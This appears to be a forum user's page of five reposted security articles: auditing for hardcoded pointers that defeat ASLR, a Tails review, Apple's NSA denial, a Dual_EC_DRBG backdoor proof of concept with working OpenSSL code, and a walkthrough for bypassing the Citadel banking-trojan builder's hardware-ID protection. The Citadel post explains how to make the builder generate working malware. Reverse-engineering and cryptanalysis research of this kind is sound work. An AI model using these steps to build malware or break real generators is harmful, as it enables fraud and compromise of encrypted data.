Everything posted by Nytro

  1. [h=3]Hardcoded Pointers[/h]

The use of hardcoded pointers can enable an attacker to bypass ASLR. In this draft I'm describing potential methods to find a hardcoded pointer in your target. When exploiting particular vulnerabilities it is essential to read from, write to, or jump to a predictable memory location in the process' address space. ASLR randomizes various key locations, including the addresses of libraries. Even though we still see some high-profile applications load libraries with ASLR disabled, we have high hopes they will fix the problem soon. That wouldn't solve the problem overall, though: applying ASLR to all libraries does not mean there are no easily predictable locations in the process' address space.

There are API functions that accept an address parameter and allocate memory at that address. These functions can be used to hardcode a memory address, and so to assign a fixed address to a pointer (CWE-587). As a consequence, they give an attacker a chance to read, write, or jump to a known address to bypass ASLR. For these functions you can specify the desired starting address of the allocation. When doing a security audit it's worth checking whether they are called with hardcoded addresses:

VirtualAlloc, VirtualAllocEx, VirtualAllocExNuma, MapViewOfFileEx, MapViewOfFileExNuma

The following functions accept an address to read as a parameter. They do not appear to be as useful, but I list them for potential future use: UnmapViewOfFile, WriteProcessMemory, ReadProcessMemory, FlushViewOfFile, FlushInstructionCache, Toolhelp32ReadProcessMemory, GetWriteWatch, ResetWriteWatch, ReadProcessMemoryProc64, VirtualUnlock, MapUserPhysicalPages, VirtualProtect, VirtualProtectEx, VirtualQueryEx, GetFrameSourceAddress, CompareFrameDestAddress, VirtualFree, VirtualFreeEx, FindNextFrame, WSPStringToAddress, CompareAddresses, AddressToString

It's also worth checking whether the application you audit uses shared memory, as some applications map the memory at a fixed address; even the Boost library supports the use of this insecure method. The use of relative pointers is less efficient than using raw pointers, so if a user can succeed in mapping the same file or shared memory object at the same address in two processes, using raw pointers can look like a good idea. To map an object at a fixed address, the user can specify that address in the mapped region's constructor:

mapped_region region ( shm                //Map shared memory
                     , read_write         //Map it as read-write
                     , 0                  //Map from offset 0
                     , 0                  //Map until the end
                     , (void*)0x3F000000  //Map it exactly there
                     );

When auditing source code for hardcoded addresses it's worth looking for constants starting with 0x and ending with 0000, as some might indicate hardcoded memory addresses. I wrote a simple batch script for that (a minimal Python equivalent is sketched after this post). The other batch script I have is for binary code; I recommend using it if you don't find a bug using other methods. To use it you need to execute dasmdir.py on the binary file to produce a disassembly, and you can then run the batch script on it to get the immediate values filtered. This is interesting. Here is an example of someone asking how to allocate memory at a fixed address, unintentionally making his software less secure.

Sursa: Reversing on Windows: Hardcoded Pointers
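To make the 0x…0000 search mentioned above concrete, here is a minimal Python equivalent (the original batch script is not reproduced here; the regex and the file handling are my own assumptions). Point it at source files or at the disassembly listing produced by dasmdir.py:

# Minimal sketch (not the author's batch script): scan text files such as
# source code or a disassembly listing for constants that start with 0x and
# end in 0000, which may indicate hardcoded memory addresses.
import re
import sys

ADDR_RE = re.compile(r'\b0x[0-9A-Fa-f]{2,8}0000\b')

def scan(path):
    with open(path, 'r', errors='ignore') as f:
        for lineno, line in enumerate(f, 1):
            for match in ADDR_RE.findall(line):
                print('%s:%d: %s' % (path, lineno, match))

if __name__ == '__main__':
    for filename in sys.argv[1:]:
        scan(filename)

Every hit still needs a manual look: a constant like 0x3F000000 may just as well be a size or a flag as a hardcoded address.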
  2. toolsmith: Tails - The Amnesiac Incognito Live System

Privacy for anyone anywhere

Prerequisites/dependencies: Systems that can boot DVD, USB, or SD media (x86, no PowerPC or ARM), 1GB RAM

Introduction

“We will open the book. Its pages are blank. We are going to put words on them ourselves. The book is called Opportunity and its first chapter is New Year's Day.” -Edith Lovejoy Pierce

First and foremost, Happy New Year! If you haven’t read or heard about the perpetual stream of rather incredible disclosures continuing to emerge regarding the NSA’s activities as revealed by Edward Snowden, you’ve likely been completely untethered from the Matrix or have indeed been hiding under the proverbial rock. As the ISSA Journal focuses on Cyber Security and Compliance for the January 2014 issue, I thought it a great opportunity to weave a few privacy related current events into the discussion while operating under the auspicious umbrella of the Cyber Security label. The most recent article that caught my attention was Reuters reporting that “as a key part of a campaign to embed encryption software that it could crack into widely used computer products, the U.S. National Security Agency arranged a secret $10 million contract with RSA, one of the most influential firms in the computer security industry.” The report indicates that RSA received $10M from the NSA in exchange for utilizing the agency-backed Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC DRBG) as its preferred random number algorithm, an allegation that RSA denies in part. In September 2013 the New York Times reported that an NSA memo released by Snowden declared that “cryptanalytic capabilities are now coming online…vast amounts of encrypted Internet data which have up till now been discarded are now exploitable.” Ars Technica’s Dan Goodin described Operation Bullrun as “a combination of ‘supercomputers, technical trickery, court orders, and behind-the-scenes persuasion’ to undermine basic staples of Internet privacy, including virtual private networks (VPNs) and the widely used secure sockets layer (SSL) and transport layer security (TLS) protocols.” Finally, consider that, again as reported by DanG, a senior NSA cryptographer, Kevin Igoe, is also the co-chair of the Internet Engineering Task Force’s (IETF) Crypto Forum Research Group (CFRG). What could possibly go wrong? According to Dan, Igoe's leadership had largely gone unnoticed until the above mentioned reports surfaced in September 2013 exposing the role NSA agents have played in "deliberately weakening the international encryption standards adopted by developers."

I must admit I am conflicted. I believe in protecting the American citizenry above all else. The NSA claims that their surveillance efforts have thwarted attacks against America. Regardless of the debate over the right or wrong of how or if this was achieved, I honor the intent. Yet, while I believe Snowden’s actions are traitorous, as an Internet denizen I can understand his concerns. The problem is that he swore an oath to his country, was well paid to honor it, and then violated it. Regardless of my take on these events and revelations, my obligation to you is to provide you with tooling options. The Information Systems Security Association (ISSA) is an international organization of information security professionals and practitioners. As such, are there means by which our global readership can better practice Internet privacy and security?
While there is no panacea, I propose that the likes of The Amnesiac Incognito Live System, or Tails, might contribute to the cause. Again, per the Tails team themselves: “Even though we're doing our best to offer you good tools to protect your privacy while using a computer, there is no magic or perfect solution to such a complex problem.” That said, Tails endeavors to help you preserve your privacy and anonymity. Tails documentation is fabulous; you would do well to start with a full read before using Tails to protect your privacy for the first time.

Tails

Tails, a merger of the Amnesia and Incognito projects, is a Debian 6 (Squeeze) Linux distribution that works optimally as a live instance via DVD, USB, or SD media. Tails seeks to provide online anonymity and censorship circumvention with the Tor anonymity network to protect your privacy online. All software is configured to connect to the Internet through Tor, and if an application tries to connect to the Internet directly, the connection is automatically blocked for security purposes. At this point the well informed amongst you are likely uttering a “whiskey tango foxtrot, Russ, in October The Guardian revealed that the NSA targeted the Tor network.” Yes, true that, but it doesn’t mean that you can’t safely use Tor in a manner that protects you. This is a great opportunity however to direct you to the Tails warning page. Please read this before you do anything else, it’s important. Schneier’s Guardian article also provides nuance: “The fact that all Tor users look alike on the internet makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.”

Getting under way with Tails is easy. Download it, burn it to your preferred media, load the media into your preferred system, and boot it up. I prefer using Tails on USB media inclusive of a persistence volume; just remember to format the USB media in a manner that leaves room to create the persistent volume. When you boot Tails, the first thing you’ll see, as noted in Figure 1, is the Tails Greeter which offers you More Options. Selecting Yes leads you to the option to set an administrative password (recommended) as well as Windows XP Camouflage mode (makes Tails look like Windows XP when you may have shoulder surfers).

FIGURE 1: Tails Greeter

You can also boot into a virtual machine, but there are some specific drawbacks to this method (the host operating system and the virtualization software can monitor what you are doing in Tails). However, Tails will warn you, as seen in Figure 2.

FIGURE 2: Tails warns regarding a VM and confirms Tor

Tor

You’ll also note in Figure 2 that TorBrowser (built on Iceweasel, a Firefox alternative) is already configured to use Tor, including the Torbutton, as well as the NoScript, Cookie Monster, and Adblock Plus add-ons. There is one Tor enhancement to consider that can be added during the boot menu sequence for Tails, where you can interrupt the boot sequence with Tab, hit Space, and then add bridge to enable Tor Bridge Mode. According to the Tor Project, bridge relays (or bridges for short) are Tor relays that aren't listed in the main Tor directory. As such, even if your ISP is filtering connections to all known Tor relays, they probably won't be able to block all bridges.
If you suspect access to the Tor network is being blocked, consider use of the Tor bridge feature, which is supported fully by Tails when booting in bridge mode. Control Tor with Vidalia, which is available via the onion icon in the notification area found in the upper right of the Tails UI. One last note on Tor use, as already described on the Tails Warning page you should have already read: your Tor use is only as good as your exit node. Remember, “Tor is about hiding your location, not about encrypting your communication.” Tor does not, and cannot, encrypt the traffic between an exit node and the destination server. Therefore, any Tor exit node is in a position to capture any traffic passing through it, and you should thus use end-to-end encryption for all communications. Be aware that Tails also offers I2P as an alternative to Tor.

Encryption Options and Features

HTTPS Everywhere is already configured for you in Tor Browser. HTTPS Everywhere uses a ruleset with regular expressions to rewrite URLs to HTTPS. Certain sites offer limited or partial support for encryption over HTTPS, but make it difficult to use where they may default to unencrypted HTTP, or provide hyperlinks on encrypted pages that point back to the unencrypted site. You can use Pidgin for instant messaging, which includes OTR or off-the-record encryption. Each time you start Tails you can count on it to generate a random username for all Pidgin accounts. If you’re afraid the computer you’ve booted Tails on (a system in an Internet café or library) is not trustworthy due to the likes of a hardware keylogger, you can use the Florence virtual keyboard, also found in the notification area as seen in Figure 3.

FIGURE 3: The Tails virtual keyboard

If you’re going to create a persistent volume (recommended) when you use Tails from USB media, do so easily with Applications | Tails | Configure persistent volume. Reboot, then be sure to enable persistence with the Tails Greeter. You will need to set up the USB stick to leave unused space for a persistent volume. You can securely wipe files and clean up available space thereafter with Nautilus Wipe. Just right click a file or files in the Nautilus file manager and select Wipe to blow it away…forever…in perpetuity. KeePassX is available to securely manage passwords and store them on your persistent volume. You can also configure all your keyrings (GPG, Gnome, Pidgin) as well as Claws Mail. Remember, the persistent volume is encrypted upon creation. You can encrypt text with a passphrase, encrypt and sign text with a public key, and decrypt and verify text with the Tails gpgApplet (the clipboard in the notification area).

One last cool Tails feature that doesn’t garner much attention is the Metadata Anonymisation app. This is not unlike Informatica 64’s OOMetaExtractor, from the same folks who bring you FOCA as described in the March 2011 toolsmith. Metadata Anonymisation is found under Applications, then Accessories. This application will strip all of those interesting file properties left in metadata, such as author names and date of creation or change. I have used my share of metadata to create a target list for social engineering during penetration tests, so it’s definitely a good idea to clean docs if you’re going to publish or share them and wish to remain anonymous. Figure 4 shows a before and after collage of PowerPoint metadata for a recent presentation I gave.
There are numerous opportunities to protect yourself using The Amnesiac Incognito Live System and I strongly advocate for you keeping an instance at the ready should you need it. It’s ideal for those of you who travel to hostile computing environments, as well as for those of you non-US readers who may not benefit from the same level of personal freedoms and protection from censorship that we typically enjoy here in the States (tongue somewhat in cheek given current events described herein).

Conclusion

Aside from hoping you’ll give Tails a good look and make use of it, I’d like to leave you with two related resources well worth your attention. The first is a 2007 presentation from Dan Shumow and Niels Ferguson of Microsoft titled On the Possibility of a Back Door in the NIST SP800-90 Dual Ec Prng. Yep, the same random number generator as described in the introduction to this column. The second resource is from bettercrypto.org and is called Applied Crypto Hardening. Systems administrators should definitely give this one a read. Enjoy your efforts to shield yourself from watchful eyes and ears and let me know what you think of Tails. Ping me via Twitter via @holisticinfosec or email if you have questions (russ at holisticinfosec dot org). Cheers…until next month.

Posted by Russ McRee at 9:58 AM

Sursa: HolisticInfoSec: toolsmith: Tails - The Amnesiac Incognito Live System
  3. Apple Says It Has Never Worked With NSA To Create iPhone Backdoors, Is Unaware Of Alleged DROPOUTJEEP Snooping Program Posted yesterday by Matthew Panzarino (@panzer) Apple has contacted TechCrunch with a statement about the DROPOUTJEEP NSA program that detailed a system by which the organization claimed it could snoop on iPhone users. Apple says that it has never worked with the NSA to create any ‘backdoors’ that would allow that kind of monitoring, and that it was unaware of any programs to do so. Here is the full statement from Apple: Apple has never worked with the NSA to create a backdoor in any of our products, including iPhone. Additionally, we have been unaware of this alleged NSA program targeting our products. We care deeply about our customers’ privacy and security. Our team is continuously working to make our products even more secure, and we make it easy for customers to keep their software up to date with the latest advancements. Whenever we hear about attempts to undermine Apple’s industry-leading security, we thoroughly investigate and take appropriate steps to protect our customers. We will continue to use our resources to stay ahead of malicious hackers and defend our customers from security attacks, regardless of who’s behind them. The statement is a response to a report in Der Spiegel Sunday that detailed a Tailored Access Operations (TAO) unit within the NSA that is tasked with gaining access to foreign computer systems in order to retrieve data to protect national security. The report also pointed out a division called ANT that was set up to compile information about hacking consumer electronics, networking systems and more. The story detailed dozens of devices and methods, including prices for deployment, in a catalogue that could be used by the NSA to pick and choose the tools it needed for snooping. The 50-page catalog included a variety of hacking tools that targeted laptops and mobile phones and other consumer devices. Der Spiegel said that these programs were evidence that the NSA had ‘backdoors’ into computing devices that many consumers use. Among these options was a program called DROPOUTJEEP — a program by which the NSA could theoretically snoop on ‘any’ Apple iPhone with ’100% success’. The documents were dated 2008, implying that these methods were for older devices. Still, the program’s detailed capabilities are worrisome. Researcher and hacker Jacob Applebaum — the co-author of the articles, coinciding with a speech he gave at a conference about the programs — pointed out that the ’100% success rate’ claimed by the NSA was worrisome as it implied cooperation by Apple. The statement from the company appears to preclude that cooperation. The program detail indicated that the NSA needed physical access to the devices at the time that the documents were published. It does note that they were working on ‘remote installation capability’ but there’s no indication whether that was actually successful. The program’s other options included physical interdiction of devices like laptops to install snooping devices — but there have been security advances like hardware encryption in recent iPhone models that would make modification of devices much more difficult. Early reports of the DROPOUTJEEP program made it appear as if every iPhone user was vulnerable to this — which simply can’t be the case. Physical access to a device was required which would preclude the NSA from simply ‘flipping a switch’ to snoop on any user. 
And Apple patches security holes with every version of iOS. The high adoption rate of new versions of iOS also means that those patches are delivered to users very quickly and on a large scale. The jailbreak community, for instance, knows that once a vulnerability has been used to open up the iPhone’s file system for modification, it’s been ‘burned’ and will likely be patched by Apple quickly. And the process of jailbreaking fits the profile of the capabilities the NSA was detailing in its slide. Applebaum’s walked listeners through a variety of the programs including DROPOUTJEEP. He noted that the claims detailed in the slide indicated that either Apple was working with the NSA to give them a backdoor, or the NSA was just leveraging software vulnerabilities to create its own access. The Apple statement appears to clear that up — pointing to vulnerabilities in older versions of iOS that have likely since been corrected. I do also find it interesting that Apple’s statement uses extremely strong wording in response to the NSA program. “We will continue to use our resources to stay ahead of malicious hackers and defend our customers from security attacks,” the statement reads, “regardless of who’s behind them.” Lumping the program in with ‘malicious hackers’ certainly makes a clear point. This year has been an eventful one for NSA spying program revelations. Apple joined a host of large companies that denied that they had been willing participants in the PRISM data collection system — but later revelations of the MUSCULAR program indicated that the NSA could get its hands on data by monitoring internal company server communications anyway. This spurred targets like Google and Yahoo to implement internal encryption. Last month, Apple released its first ever report on government information requests, detailing the number of times domestic and foreign governments had asked it for user information. At the time, it also filed a suit with the U.S. Government to allow it to be more transparent about the number and frequency of those requests. It also began employing a ‘warrant canary’ to warn users of future compliance with Patriot Act information requests. Most recently, Apple joined AOL, Yahoo, Twitter, Microsoft, LinkedIn, Google and Facebook in requesting global government surveillance reform with an open letter. Though the NSA is located in the United States and these programs were largely designed to target ‘foreign threats’, these companies have a global customer base — making protecting user privacy abroad as well as at home just as important. Image Credit: EFF Sursa: Apple Says It Has Never Worked With NSA To Create iPhone Backdoors, Is Unaware Of Alleged DROPOUTJEEP Snooping Program | TechCrunch
  4. [h=1]Dual_EC_DRBG backdoor: a proof of concept[/h]

[h=2]What’s this ?[/h]

Dual_EC_DRBG is a pseudo-random number generator promoted by NIST in NIST SP 800-90A and created by the NSA. This algorithm is problematic because it has been made mandatory by the FIPS norm (and should be implemented in every piece of FIPS approved software) and some vendors even promoted this algorithm as the first source of randomness in their applications. edit: I’ve been told it’s not the case anymore in FIPS-140-2, but the cat is already out of the bag. If you still believe Dual_EC_DRBG was not backdoored on purpose, please keep reading.

In 2007 already, Dan Shumow and Niels Ferguson from Microsoft showed that the Dual_EC_DRBG algorithm could be backdoored. Twitter also uncovered recently that this algorithm was even patented in 2004 by Dan Brown (not the Da Vinci guy, the Certicom one) as a “key escrow mechanism” (government jargon for trapdoor/backdoor). I will go a little bit further in explaining how it works and give proof-of-concept code, based on OpenSSL FIPS. This is, to the best of my knowledge, the only public proof of concept published today (correct me if I’m wrong).

[h=2]Dual_EC_DRBG in a nutshell[/h]

The PRNG works as follows: it takes a seed that goes through a hashing algorithm. This data is then “fed” into two Elliptic Curve points, P and Q, before being slightly transformed and output. In order to understand how the algorithm (and the backdoor) works, let’s see the relevant maths from Elliptic Curves:

[h=3]Elliptic curves[/h]

Many types of elliptic curves exist. They are classified according to their properties and equations. We’re going to look at the curve NIST-p256, which is one of the three curves used by Dual_EC_DRBG. NIST-p384 and NIST-p521 have very similar characteristics. I’ll try to (poorly) give you the basics of the theory for EC, but I’m no mathematician. Please forgive me and correct me if I’m wrong.

A curve is a set of points that follow a group structure. The curve is defined over several parameters (for NIST GFp curves):

Equation: all the members of that group (called points) must satisfy this equation.
Prime modulus p: a prime number used to define the finite field Z/pZ in which the equation elements are defined.
The order r: this is the order of the EC and the total number of points in the group.
a and b: fixed integers used in the curve’s equation. a is set to -3 in NIST GF(p) curves.
A Generator point defined by Gx and Gy: this point is considered the base element of the group.

Curve members are points. A point is a pair of coordinates X and Y that satisfy the curve’s equation. They are written as capital letters such as G, P or Q. Points have some characteristics from groups:

They have an addition operation (+) defined between two points (e.g. P + Q). This addition is commutative and associative.
Since you can add a point to itself as many times as you want, there is a scalar multiplication, which is the multiplication of a scalar (0..n) with a point and results in another point. That scalar multiplication is associative/commutative (a(bP) = b(aP)). The scalar should be in the group of integers modulo r (the order of the curve).

The group of Elliptic Curves is very useful in cryptography, because an equation such as iQ = P is very easy to solve for Q or P (if you know i) but very hard to solve for i (if all you know is P and Q). This is the Discrete Logarithm Problem in the EC group.
That’s why most of the time the points are used as public parameters/keys and scalars as their private counterparts. All NIST curves have different parameters p, r, a, b and points G. These parameters have been constructed from a sha1 hash of a public seed, but nobody knows how the seed itself has been chosen. Enough on the theory, let’s study the PRNG !

[h=2]Dual_EC_DRBG internals[/h]

Dual_EC_DRBG is defined in NIST SP800-90A page 60. It is an algorithm generating an infinite number of pseudo-random sequences from a single seed, taken in the first step or after an explicit reseed. It is unfortunate that SP800-90A and the presentation from Microsoft use conflicting terminology (variable names), so I will use these variables: s for the internal seed value and r for the external (output) value. You can also see in the document two functions: phi and x(). phi is a function that does a mapping between a large integer and binary data. It doesn’t do much, in fact we can happily ignore it. x(P) simply gets the X coordinate of a point, as the X and Y coordinates are mostly redundant (as we’re going to see later). If we unroll the inductive feedback loop on the first two generated outputs, we get this:

s1 = phi(x(s0 * P)); r1 = phi(x(s1 * Q)) -> output(30 least significant bytes of r1)
s2 = phi(x(s1 * P)); r2 = phi(x(s2 * Q)) -> output(30 least significant bytes of r2)

[h=2]An attack[/h]

Let’s begin working on the first output r1 and see whether we can guess the internal state from its content. We can see that r1 is the X coordinate of a point, with 16 bits missing (we lost the 2 most significant bytes in the output process). In a NIST GFp curve, for every value of X there are zero, one or two points on the curve. So we have at most 17 bits of bruteforce to do to recover the original point A. Let’s work on the hypothesis that we know the point A, which is equal (by definition) to A = s1 * Q. Then s2 = phi(x(s1 * P)); but if we have a (secret) relation between P and Q such as P = d * Q, with d = a secret number (our backdoor !), then s1 * P = s1 * (d * Q) = d * (s1 * Q) = d * A, and therefore s2 = phi(x(d * A)). If you look carefully at the unrolled algorithm, you will notice that if we know s2 we can calculate r2, and then we have all the required information to calculate the subsequent si and ri. All we need to do is guess a value of A (based on a bruteforce approach), multiply it by the secret value d, then multiply the resulting scalar with Q, strip two bytes and publish the output. It is also very interesting that if we learn (in a practical attack) the first 32 bytes generated by this PRNG, the first 30 bytes give us candidates for A and the remaining two bytes can be used to validate our findings. If the X value had been output on 32 bytes, we would have a one in two chance of success because of the two coexisting points on the same coordinate X. (Remember from high school, second degree equations can have two solutions.)

[h=2]Generating the constants[/h]

As you have seen before, for our backdoor to work we need to choose the P and Q points so that we hold the secret key to the backdoor. We would like to define P = d * Q; however, that can’t work directly, because P is the generator of the EC group and its value has already been fixed. So we have to find a value e such that Q = e * P. This value can be calculated: from P = d * Q, multiplying by e gives e * P = (e * d) * Q, which equals Q when e * d = 1 (mod r). So we need to find a value e such that e * d = 1 for the curve C; the equation to solve is e * d = 1 (mod r), where r is the order of the EC. The value of e is the inverse of d modulo r. We can then use that value to generate Q.
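Before the author's OpenSSL code below, a minimal Python sketch of this constant-generation step (not part of the original PoC; the modulus and scalar here are toy placeholders, and pow(x, -1, m) needs Python 3.8+):

# Toy illustration of the step described above: pick a secret d and compute
# e = d^-1 (mod r) so that Q = e*P satisfies P = d*Q. The values below are
# placeholders, NOT the real NIST P-256 group order or the PoC's secret.
r = 4294967291            # a prime standing in for the curve order r
d = 0x75916764 % r        # stand-in for the secret 256-bit scalar
e = pow(d, -1, r)         # modular inverse (Python 3.8+)
assert (d * e) % r == 1   # e*d = 1 (mod r), so e*P = (e*d)*Q = Q
print('d = %#x, e = %#x' % (d, e))

The real PoC does the same inversion with BN_mod_inverse against the actual group order, as the next block shows.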
/* 256 bits value randomly generated */
unsigned char d[]=
    "\x75\x91\x67\x64\xbe\x30\xbe\x85\xd1\x50\x09\x19\x50\x8a\xf4\xb5"
    "\x7a\xc7\x09\x22\x07\x32\xae\x40\xac\x3e\xd5\xfe\x2e\x12\x25\x2a";

d_bn = BN_new();
assert(d_bn != NULL);
BN_bin2bn(d, 32, d_bn);
/* ensure d is well inside the group order */
EC_GROUP_get_order(curve, r, bn_ctx);
BN_mod(d_bn, d_bn, r, bn_ctx);
/* calculate Q = d * Generator + (NULL * NULL) */
ret = EC_POINT_mul(curve, my_Q, d_bn, NULL, NULL, bn_ctx);
assert(ret == 1);
/* calculate e = d^-1 (mod r) */
e_bn = BN_new();
assert(e_bn != NULL);
/* invert d to get the value of e */
assert(NULL != BN_mod_inverse(e_bn, d_bn, r, bn_ctx));

(note: I know I mixed up e with d between the code and the blog post, but that doesn’t change anything at all.)

[h=2]Implementation[/h]

You can find the proof of concept code on my github. I’ll comment on how it works:

[h=3]Install OpenSSL/FIPS[/h]

Most of the work needed for this POC was actually fighting with OpenSSL FIPS mode (getting it to compile at first) and finding the right APIs to use. OpenSSL FIPS and OpenSSL are two different pieces of software that share some codebase. I had to fetch a specific commit of OpenSSL FIPS (one that would compile) and patch it a little to have a few functions from Bignums usable from inside my application. I haven’t been able to mix FIPS and regular libcrypto, because of header incompatibilities (or a bug in my code I thought was caused by incompatibilities). The README explains the steps to take (please read it).

[h=3]Recover point A[/h]

If you remember, we have the 30 least significant bytes of the X coordinate, which means we need to bruteforce our way into A point candidates. This can easily be done in a loop over the 2^16 possibilities. OpenSSL doesn’t provide any way of recovering a point from a single coordinate (there exists a point compression algorithm, but it is so badly patented that it’s not implemented anywhere). We have to solve the curve’s equation y^2 = x^3 - 3x + b (mod p). Solving such an equation for y is not so different from the equation solving you learned in high school:

for (prefix = 0; prefix <= 0x10000 ; ++prefix){
    x_bin[0] = prefix >> 8;
    x_bin[1] = prefix & 0xff;
    BN_bin2bn(x_bin, 32, x_value);
    //bnprint("X value", x_value);

    /* try to find y such as */
    /* y^2 = x^3 - 3x + b (mod p) */
    /* tmp1 = x^2 */
    ret = BN_mod_mul(tmp1, x_value, x_value, &curve->field, bn_ctx);
    assert(ret == 1);
    ret = BN_set_word(tmp2, 3);
    assert(ret == 1);
    /* tmp1 = x^2 - 3 */
    ret = BN_mod_sub(tmp1, tmp1, tmp2, &curve->field, bn_ctx);
    assert(ret == 1);
    /* tmp1 = (x^2 -3) * x */
    ret = BN_mod_mul(tmp1, x_value, tmp1, &curve->field, bn_ctx);
    assert(ret == 1);
    /* tmp1 = x^3 - 3x + b */
    ret = BN_mod_add(tmp1, tmp1, b_bn, &curve->field, bn_ctx);
    assert(ret == 1);
    //bnprint("Y squared", tmp1);
    if (NULL != BN_mod_sqrt(y_value, tmp1, &curve->field, bn_ctx)) {
        //printf("value %x match !\n", prefix);
        if(verbose)
            bnprint("calculated Y", y_value);
        BN_mod_sub(y_value, zero_value, y_value, &curve->field, bn_ctx);
        if(verbose)
            bnprint("calculated Y opposite", y_value);
        test_candidate(buffer + 30, x_value, y_value, bn_ctx);
        valid_points += 2;
    }
}

I mentioned that for every X there are zero, one or two solutions: zero if the square root fails (not all elements of Z/pZ are quadratic residues), one if the result is 0, and two for all other answers. There are then two valid points (x, y) and (x, -y), where -y is the opposite of the first value modulo p (explanation thanks to Rod).

[h=3]Recover PRNG state and generate next block[/h]

This part is pretty straightforward.
We import the estimated x and y values, verify that they are on the curve (they should be!), then multiply that point with the secret value. We then multiply Q with the resulting scalar and we get 30 bytes of the next output. If the first two bytes match, we have successfully guessed the 28 remaining bytes. That attack can recover everything output by that PRNG until a reseed.

/* create the point A based on calculated coordinates x and y */
ret = EC_POINT_set_affine_coordinates_GFp(curve, point, x, y, bn_ctx);
assert(ret == 1);
/* Normally the point should be on curve but we never know */
if (!EC_POINT_is_on_curve(curve, point, bn_ctx))
    goto end;
/* calculates i2 = phi(x(e.A)) */
ret = EC_POINT_mul(curve, point, NULL, point, e_bn, bn_ctx);
assert(ret ==1);
ret = EC_POINT_get_affine_coordinates_GFp(curve, point, i2x, NULL, bn_ctx);
assert(ret ==1);
if(verbose)
    bnprint ("i2_x", i2x);
/* calculate o1 = phi(x(i2 * Q)) */
ret = EC_POINT_mul(curve, point, NULL, my_Q, i2x, bn_ctx);
assert(ret == 1);
ret = EC_POINT_get_affine_coordinates_GFp(curve, point, o1x, NULL, bn_ctx);
if(verbose)
    bnprint ("o1_x", o1x);
BN_bn2bin(o1x, o1x_bin);
if (o1x_bin[2] == buffer[0] && o1x_bin[3] == buffer[1]){
    printf("Found a match !\n");
    bnprint("A_x", x);
    bnprint("A_y", y);
    print_hex("prediction", o1x_bin + 4, 28);
}

[h=3]Let’s run it ![/h]

aris@kalix86:~/dualec$ ./dual_ec_drbg_poc
s at start of generate: E9B8FBCFCDC7BCB091D14A41A95AD68966AC18879ECC27519403B34231916485
[omitted: many output from openssl]
y coordinate at end of mul: 0663BC78276A258D2F422BE407F881AA51B8D2D82ECE31481DB69DFBC6C4D010
r in generate is: 96E8EBC0D507C39F3B5ED8C96E789CC3E6861E1DDFB9D4170D3D5FF68E242437
Random bits written: 000000000000000000000000000000000000000000000000000000000000
y coordinate at end of mul: 5F49D75753F59EA996774DD75E17D730051F93F6C4EB65951DED75A8FCD5D429
s in generate: C64EAF10729061418EB280CCB288AD9D14707E005655FDD2277FC76EC173125E
[omitted: many output from openssl]
PRNG output: ebc0d507c39f3b5ed8c96e789cc3e6861e1ddfb9d4170d3d5ff68e242437449e
Found a match !
A_x: 96e8ebc0d507c39f3b5ed8c96e789cc3e6861e1ddfb9d4170d3d5ff68e242437
A_y: 0663bc78276a258d2f422be407f881aa51b8d2d82ece31481db69dfbc6c4d010
prediction: a3cbc223507c197ec2598e6cff61cab0d75f89a68ccffcb7097c09d3
Reviewed 65502 valid points (candidates for A)
PRNG output: a3cbc223507c197ec2598e6cff61cab0d75f89a68ccffcb7097c09d3
Yikes !

[h=2]Conclusion[/h]

It is quite obvious, in light of the recent revelations from Snowden, that this weakness was introduced on purpose by the NSA. It is very elegant and leaks its complete internal state in only 32 bytes of output, which is very impressive knowing it takes 32 bytes of input as a seed. It is obviously complete madness to use the reference implementation from NIST and I’m not the only one to be angry about it. You could use it with custom P and Q values, but that’s very seldom possible. Nevertheless, having a whole EC point parameter leaked in the output makes it too easy to distinguish from real randomness, and it should never have been made into any specs at all. Let’s all bury that PRNG and the “security” companies bribed by the NSA to enable backdoors by default for thirty silver coins.

edits: fixed Dan Brown’s employer name, changed a variable name to avoid confusion, fixed counting error 28 bytes to 30 bytes

note: I did not break the official algorithm. I do not know the secret value used to compute the Q constant, and thus cannot break the default implementation.
Only NSA (and people with access to the key) can exploit the PRNG weakness. Sursa: Dual_Ec_Drbg backdoor: a proof of concept at Aris' Blog - Computers, ssh and rock'n roll
  5. [h=3]How the protection of Citadel got cracked[/h]

Recently on a forum someone requested cbcs.exe (the Citadel Backconnect Server). If you want to read more about the backconnect feature in Citadel, the link that g4m372 shared is cool: Laboratorio Malware: Troyan Citadel BackConnect VNC Server Manager

I searched for this file by downloading a random mirror of the leaked Citadel package, hoping to find it inside. In the end the file wasn't in the leaked archive, but it had already been grabbed by various malware trackers.

MD5: 50A59E805EEB228D44F6C08E4B786D1E
Malwarebytes: Backdoor.Citadel.BkCnct

And since I've downloaded the leaked Citadel package... let's look at the Builder. It can be interesting to make a post about it.

Citadel.exe: a33fb3c7884050642202e39cd7f177e0
Malwarebytes: Hacktool.Citadel.Builder

"ERROR: Builder has been moved to another PC or virtual environment, now it is deactivated."

This file is packed with UPX. The same goes for the Citadel Backconnect Server and the Hardware ID generator. But when we try to unpack it via UPX we get an exception: UPX tells us that there is something wrong with the file header; aquabox used a lame trick. With a hexadecimal editor we can clearly see that there is a problem with the DOS header: we have 0x4D 0x5A ... 00 ... and a size of 0xE8 for the memory. e_lfanew is null, so let's fix it by setting that field (the DWORD at offset 3Ch of the DOS header) to 0x40 (a small scripted version of this fix is sketched at the end of this post). Miracle.

The same trick works for the Hardware ID Calculator and the Citadel Backconnect Server; I will get back to these two files later.

Now that we have clear code we can see the Time/Date Stamp, view the resources and, more interestingly, see how Citadel is protected. Viewing the strings already gives us a good insight: PHYSICALDRIVE0, Win32_BIOS, Win32_Processor, SerialNumber...

But we don't even really need to waste time trying to understand how the generation is made, although you can put a breakpoint at the beginning of the calculation procedure (0x4013F2). At the end, you will be here; this routine finalises your HID:

From another side, you can also have a look at the Hardware ID Calculator. I had a problem with this file: the first layer was a SFX archive with malware embedded (a stealer). Conclusion: don't rush on leaked stuff.

Alright, now that you have extracted/unpacked the good HID Calculator you can open it in Olly. The code is exactly the same as the one you can find in the Citadel Builder, so it may help to locate the calculation procedure in the builder, although it's really easy to locate anyway. That was just a short parenthesis; to get back to the builder, after the generation ends you will have multiple occasions to view your HID on the stack, like here:

And the crucial part starts here. When the Citadel package of Citab got leaked (see this article for more information) an important file was also released: the HID of the original machine that was running the builder. So you just have to replace your HID with this one, just like this:

And this is how the protection of Citadel becomes super weak and can generate working malware. Now you just have to do a codecave or inject a DLL in order to modify it permanently - child's play.

